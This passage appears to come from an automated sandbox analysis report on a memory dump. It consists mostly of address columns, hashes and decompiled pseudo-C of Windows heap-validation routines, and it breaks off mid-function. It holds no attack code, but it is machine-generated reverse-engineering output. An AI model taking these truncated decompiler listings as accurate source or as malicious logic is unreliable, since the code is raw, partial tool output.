                    0x00000000
                    0x01094ff6
                    0x010950de
                    0x010950e4
                    0x010950e8
                    0x01095107
                    0x0109510c
                    0x010950ea
                    0x010950ff
                    0x01095104
                    0x01095112
                    0x01095115
                    0x01095118
                    0x01095119
                    0x010950cb
                    0x010950cb
                    0x010950af
                    0x00000000
                    0x010950af
                    0x01094ecb
                    0x010950b6
                    0x010950bb
                    0x01094ed1
                    0x01094ee6
                    0x01094eeb
                    0x010950c1
                    0x010950c2
                    0x010950c5
                    0x010950c6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01094b15
                    0x01094b15
                    0x01094b1c
                    0x01094b1e
                    0x01094b23
                    0x01094b27
                    0x01094b33
                    0x01094b38
                    0x01094b3a
                    0x01094b3c
                    0x01094b41
                    0x01094b41
                    0x01094b3a
                    0x01094b52
                    0x01095045
                    0x0109504b
                    0x0109504f
                    0x0109506e
                    0x01095073
                    0x01095051
                    0x01095066
                    0x0109506b
                    0x01095083
                    0x01095088
                    0x01095088
                    0x0109508a
                    0x01095091
                    0x01095099
                    0x01095099
                    0x0109509d
                    0x010950a7
                    0x010950ad
                    0x010950ad
                    0x010950ad
                    0x00000000
                    0x0109509d
                    0x01094b58
                    0x01094b5b
                    0x01094b5e
                    0x01094b63
                    0x01094b66
                    0x01094b69
                    0x01094b6f
                    0x01094be4
                    0x01094bf0
                    0x01094bf2
                    0x01094bf5
                    0x01094dc3
                    0x01094dc6
                    0x01094dc9
                    0x01094dce
                    0x01094dce
                    0x01094dd0
                    0x01094dd0
                    0x01094dd5
                    0x01094def
                    0x01094dd7
                    0x01094de7
                    0x01094de7
                    0x01094df3
                    0x01095001
                    0x01095007
                    0x0109500b
                    0x0109502a
                    0x0109502f
                    0x0109500d
                    0x01095022
                    0x01095027
                    0x01095039
                    0x0109503a
                    0x0109503b
                    0x00000000
                    0x01094df9
                    0x01094dfd
                    0x01094e90
                    0x01094e94
                    0x01094e9e
                    0x01094ea4
                    0x01094ea4
                    0x01094ea4
                    0x01094ea6
                    0x01094ea6
                    0x00000000
                    0x01094ea6
                    0x01094e03
                    0x01094e08
                    0x01094f88
                    0x01094f92
                    0x01094f99
                    0x01094f9c
                    0x01094fe0
                    0x01094fe4
                    0x01094fee
                    0x01094ff4
                    0x01094ff4
                    0x01094ff4
                    0x00000000
                    0x01094fe4
                    0x01094f9e
                    0x01094fa4
                    0x01094fa8
                    0x01094fc7
                    0x01094fcc
                    0x01094faa
                    0x01094fbf
                    0x01094fc4
                    0x01094fd2
                    0x01094fd5
                    0x01094fd6
                    0x01094f34
                    0x01094f34
                    0x00000000
                    0x01094f39
                    0x01094e0e
                    0x01094e14
                    0x01094e1b
                    0x01094e25
                    0x01094e2b
                    0x01094e2b
                    0x01094e33
                    0x01094e38
                    0x01094e8a
                    0x01094e8a
                    0x00000000
                    0x01094e3a
                    0x01094e3e
                    0x01094e43
                    0x01094e47
                    0x01094e53
                    0x01094e58
                    0x01094e5a
                    0x01094e5c
                    0x01094e61
                    0x01094e61
                    0x01094e5a
                    0x01094e6e
                    0x01094f41
                    0x01094f47
                    0x01094f4b
                    0x01094f6a
                    0x01094f6f
                    0x01094f4d
                    0x01094f62
                    0x01094f67
                    0x01094f7f
                    0x01094f80
                    0x01094f81
                    0x00000000
                    0x01094e74
                    0x01094e78
                    0x01094e82
                    0x01094e88
                    0x01094e88
                    0x00000000
                    0x01094e78
                    0x01094e6e
                    0x01094e38
                    0x01094df3
                    0x01094bfe
                    0x01094c01
                    0x01094c04
                    0x01094c07
                    0x01094c09
                    0x01094c0c
                    0x01094c0e
                    0x01094c0e
                    0x01094c11
                    0x01094c11
                    0x01094c0c
                    0x01094c14
                    0x01094c17
                    0x01094dae
                    0x01094db2
                    0x01094db7
                    0x01094dba
                    0x01094dbd
                    0x01094ef1
                    0x01094ef7
                    0x01094efb
                    0x01094f1a
                    0x01094f1f
                    0x01094efd
                    0x01094f12
                    0x01094f17
                    0x01094f2b
                    0x01094f2b
                    0x01094f2d
                    0x01094f2e
                    0x01094f2f
                    0x00000000
                    0x01094f2f
                    0x00000000
                    0x01094c1d
                    0x01094c1d
                    0x01094c20
                    0x01094c23
                    0x01094c26
                    0x01094c29
                    0x01094c2c
                    0x01094c2e
                    0x01094d91
                    0x01094d91
                    0x01094d92
                    0x01094d97
                    0x01094d9e
                    0x00000000
                    0x01094d9e
                    0x01094c34
                    0x01094c37
                    0x01094c39
                    0x01094c3c
                    0x00000000
                    0x00000000
                    0x01094c45
                    0x01094c48
                    0x01094c4e
                    0x01094c50
                    0x01094c78
                    0x01094c78
                    0x01094c7b
                    0x01094c7d
                    0x01094c80
                    0x01094c84
                    0x01094cad
                    0x01094cad
                    0x01094cb0
                    0x01094cb8
                    0x01094cbb
                    0x01094cbe
                    0x01094cc1
                    0x01094cc7
                    0x01094cdc
                    0x01094cc9
                    0x01094cd2
                    0x01094cd4
                    0x01094cd4
                    0x01094cde
                    0x01094ce0
                    0x01094d13
                    0x01094d13
                    0x01094d16
                    0x01094d18
                    0x01094d29
                    0x01094d2a
                    0x01094d2c
                    0x01094d34
                    0x01094d1a
                    0x01094d1a
                    0x01094d1a
                    0x01094d1d
                    0x01094d1f
                    0x01094d22
                    0x01094d24
                    0x01094d24
                    0x01094d3c
                    0x01094d3f
                    0x01094d45
                    0x01094d47
                    0x01094d6c
                    0x01094d6c
                    0x01094d70
                    0x01094d7e
                    0x01094d84
                    0x01094d84
                    0x00000000
                    0x01094d49
                    0x01094d49
                    0x01094d56
                    0x01094d56
                    0x01094d59
                    0x00000000
                    0x00000000
                    0x01094d4e
                    0x01094d50
                    0x01094d52
                    0x01094d8e
                    0x01094d5d
                    0x01094d5f
                    0x01094d67
                    0x00000000
                    0x01094d67
                    0x01094d54
                    0x01094d54
                    0x01094d5b
                    0x00000000
                    0x01094d5b
                    0x01094ce2
                    0x01094ce2
                    0x01094ce5
                    0x01094ce5
                    0x01094ce7
                    0x01094cfb
                    0x01094ce9
                    0x01094ce9
                    0x01094cec
                    0x01094cef
                    0x01094cf1
                    0x01094cf3
                    0x01094cf3
                    0x01094cf3
                    0x01094cf6
                    0x01094cf6
                    0x01094d02
                    0x01094d05
                    0x00000000
                    0x00000000
                    0x01094d07
                    0x01094d0f
                    0x01094d11
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01094d11
                    0x00000000
                    0x01094ce5
                    0x01094ce0
                    0x01094c8a
                    0x01094c8f
                    0x01094c91
                    0x00000000
                    0x00000000
                    0x01094c9d
                    0x00000000
                    0x01094c9d
                    0x01094c52
                    0x01094c5f
                    0x01094c5f
                    0x01094c62
                    0x00000000
                    0x00000000
                    0x01094c57
                    0x01094c59
                    0x01094c5b
                    0x01094caa
                    0x01094c66
                    0x01094c68
                    0x01094c70
                    0x01094c75
                    0x00000000
                    0x01094c75
                    0x01094c5d
                    0x01094c5d
                    0x01094c64
                    0x00000000
                    0x01094c64
                    0x01094c17
                    0x01094b75
                    0x01094bc4
                    0x01094bc8
                    0x00000000
                    0x00000000
                    0x01094bd9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01094b77
                    0x01094b7a
                    0x01094b8c
                    0x01094b7c
                    0x01094b7e
                    0x01094b83
                    0x01094b86
                    0x01094b86
                    0x01094b90
                    0x01094b93
                    0x00000000
                    0x00000000
                    0x01094b95
                    0x01094bab
                    0x01094bb0
                    0x00000000
                    0x00000000
                    0x01094bb2
                    0x01094bb9
                    0x00000000
                    0x00000000
                    0x01094bbb
                    0x01094bbe
                    0x01094bc1
                    0x01094bc1
                    0x00000000
                    0x01094bc1
                    0x01094b97
                    0x01094ba4
                    0x00000000
                    0x00000000
                    0x01094ba6
                    0x00000000
                    0x01094ba6
                    0x01094ea9
                    0x01094ea9
                    0x01094eb2
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                    • API String ID: 0-3591852110
                    • Opcode ID: 438f2cc693b8099f9bbfbeaf05d6c20c5356584dda696015c0b42597bdba5276
                    • Instruction ID: bd8fdb18e6728d34e14c9201d3b9772e2ef20a60fafed13b754a460f75ae74b9
                    • Opcode Fuzzy Hash: 438f2cc693b8099f9bbfbeaf05d6c20c5356584dda696015c0b42597bdba5276
                    • Instruction Fuzzy Hash: A012C170204646DFDB25DF29C5A5BBABBF1EF44300F148499E4C6CB682D738E882EB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01094496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 56%
                    			E01094496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E010949A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x10c6378 = _t267;
						asm("int3");
						 *0x10c6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0100174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00FDB150();
							} else {
								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00FDB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00FDB150();
							} else {
								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00FDB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x10c6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01019660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0100174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00FDB150();
										} else {
											E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00FDB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00FDB150();
									} else {
										E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00FDB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00FDB150();
								} else {
									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00FDB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00FDB150();
							} else {
								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01094AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0108FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010823E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                    0x010944a1
                    0x010944a3
                    0x010944a7
                    0x010944ac
                    0x010944af
                    0x010944b2
                    0x010944b9
                    0x010944bc
                    0x010947f2
                    0x010947f2
                    0x010947f8
                    0x010947fc
                    0x010947fe
                    0x01094804
                    0x01094805
                    0x01094805
                    0x0109480c
                    0x01094810
                    0x01094812
                    0x01094812
                    0x01094812
                    0x01094822
                    0x01094822
                    0x01094827
                    0x01094827
                    0x00000000
                    0x01094827
                    0x010944c4
                    0x010944d3
                    0x010944d9
                    0x010944dc
                    0x010944de
                    0x010944e0
                    0x01094560
                    0x01094520
                    0x01094522
                    0x01094525
                    0x01094528
                    0x0109452b
                    0x0109452e
                    0x01094530
                    0x01094697
                    0x0109469d
                    0x010946a1
                    0x010946c0
                    0x010946c5
                    0x010946a3
                    0x010946b8
                    0x010946bd
                    0x010946cb
                    0x010946d4
                    0x01094677
                    0x01094677
                    0x01094679
                    0x0109467c
                    0x0109468a
                    0x01094690
                    0x01094690
                    0x010947f1
                    0x010947f1
                    0x010947f1
                    0x00000000
                    0x010947f1
                    0x01094536
                    0x01094539
                    0x0109453c
                    0x01094636
                    0x0109463c
                    0x01094640
                    0x0109465f
                    0x01094664
                    0x01094642
                    0x01094657
                    0x0109465c
                    0x01094670
                    0x00000000
                    0x01094542
                    0x01094542
                    0x01094546
                    0x01094548
                    0x0109454b
                    0x01094555
                    0x0109455b
                    0x0109455b
                    0x0109455b
                    0x0109455d
                    0x0109455d
                    0x0109455d
                    0x00000000
                    0x0109455d
                    0x0109453c
                    0x01094579
                    0x0109457c
                    0x01094587
                    0x01094589
                    0x01094591
                    0x01094592
                    0x01094597
                    0x01094598
                    0x010945a1
                    0x010945ab
                    0x010945ab
                    0x010945a1
                    0x010945ae
                    0x010945b4
                    0x010945b9
                    0x010945bd
                    0x01094759
                    0x01094759
                    0x0109475f
                    0x01094761
                    0x01094763
                    0x01094765
                    0x01094768
                    0x0109476b
                    0x0109476d
                    0x0109479c
                    0x0109479c
                    0x0109479f
                    0x010947a2
                    0x010947a4
                    0x01094830
                    0x01094833
                    0x01094879
                    0x0109487d
                    0x010948f1
                    0x010948f3
                    0x010948f3
                    0x00000000
                    0x010948f3
                    0x0109487f
                    0x01094885
                    0x01094887
                    0x010948a8
                    0x010948a8
                    0x010948ae
                    0x010948b0
                    0x010948dc
                    0x010948dc
                    0x010948dc
                    0x010948dc
                    0x010948ec
                    0x00000000
                    0x010948ec
                    0x010948b2
                    0x010948bc
                    0x010948be
                    0x010948c1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010948c3
                    0x010948c3
                    0x010948c6
                    0x010948c9
                    0x010948cc
                    0x010948d1
                    0x010948d4
                    0x00000000
                    0x00000000
                    0x010948d6
                    0x010948d7
                    0x010948da
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010948da
                    0x0109494f
                    0x01094955
                    0x01094959
                    0x01094978
                    0x0109497d
                    0x0109495b
                    0x01094970
                    0x01094975
                    0x01094986
                    0x01094987
                    0x0109498a
                    0x0109498d
                    0x01094997
                    0x010947ef
                    0x010947ef
                    0x010947ef
                    0x00000000
                    0x010947ef
                    0x01094890
                    0x01094890
                    0x01094891
                    0x01094891
                    0x01094894
                    0x01094897
                    0x0109489d
                    0x010948a0
                    0x00000000
                    0x00000000
                    0x010948a2
                    0x010948a3
                    0x010948a6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010948a6
                    0x010948fb
                    0x01094901
                    0x01094905
                    0x01094924
                    0x01094929
                    0x01094907
                    0x0109491c
                    0x01094921
                    0x0109492f
                    0x01094935
                    0x01094936
                    0x01094939
                    0x01094942
                    0x00000000
                    0x01094947
                    0x01094835
                    0x0109483b
                    0x0109483f
                    0x0109485e
                    0x01094863
                    0x01094841
                    0x01094856
                    0x0109485b
                    0x01094869
                    0x0109486c
                    0x0109486f
                    0x010947e7
                    0x010947e7
                    0x00000000
                    0x010947ec
                    0x010947aa
                    0x010947b0
                    0x010947b4
                    0x010947d3
                    0x010947d8
                    0x010947b6
                    0x010947cb
                    0x010947d0
                    0x010947de
                    0x010947df
                    0x010947e2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0109476f
                    0x0109476f
                    0x01094778
                    0x01094785
                    0x01094787
                    0x0109478c
                    0x0109478e
                    0x00000000
                    0x00000000
                    0x01094790
                    0x01094792
                    0x01094794
                    0x00000000
                    0x00000000
                    0x01094796
                    0x01094799
                    0x00000000
                    0x01094799
                    0x00000000
                    0x010945c3
                    0x010945c3
                    0x010945c7
                    0x010945c7
                    0x010945ca
                    0x010945cf
                    0x010945d3
                    0x010945df
                    0x010945e4
                    0x010945e6
                    0x010945e8
                    0x010945ed
                    0x010945ed
                    0x010945f2
                    0x010945f2
                    0x010945f7
                    0x010945fc
                    0x01094602
                    0x01094606
                    0x01094609
                    0x0109460f
                    0x010946de
                    0x010946e3
                    0x010946e5
                    0x010946ec
                    0x010946ee
                    0x010946f6
                    0x010946f6
                    0x010946f6
                    0x010946f6
                    0x010946ec
                    0x01094615
                    0x01094615
                    0x0109461d
                    0x0109462e
                    0x0109462e
                    0x0109461d
                    0x0109460f
                    0x01094609
                    0x010946fd
                    0x00000000
                    0x00000000
                    0x01094710
                    0x0109471a
                    0x01094720
                    0x01094720
                    0x01094722
                    0x0109472c
                    0x00000000
                    0x0109472e
                    0x0109472e
                    0x00000000
                    0x0109472e
                    0x0109472c
                    0x01094738
                    0x0109473c
                    0x0109474b
                    0x01094751
                    0x01094751
                    0x00000000
                    0x0109473c
                    0x010948f4
                    0x010948f4
                    0x00000000
                    0x010948f4

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                    • API String ID: 0-1357697941
                    • Opcode ID: 63246a0713b7f9e831778e5f4fbc1e2e1c535edb081d630cfc8b457254c3bbcc
                    • Instruction ID: 2cfabf0b7679b23bd9ad5ad3b5b8e9c3cb7836f94db32008e394a8ae1fdd3c4a
                    • Opcode Fuzzy Hash: 63246a0713b7f9e831778e5f4fbc1e2e1c535edb081d630cfc8b457254c3bbcc
                    • Instruction Fuzzy Hash: 7DF11231600646DFDF21CFA8C560BAABBF5FF09304F088099E186DB691D738E946DB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E00FFA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x10c8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00FFA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00FFDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00FD9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
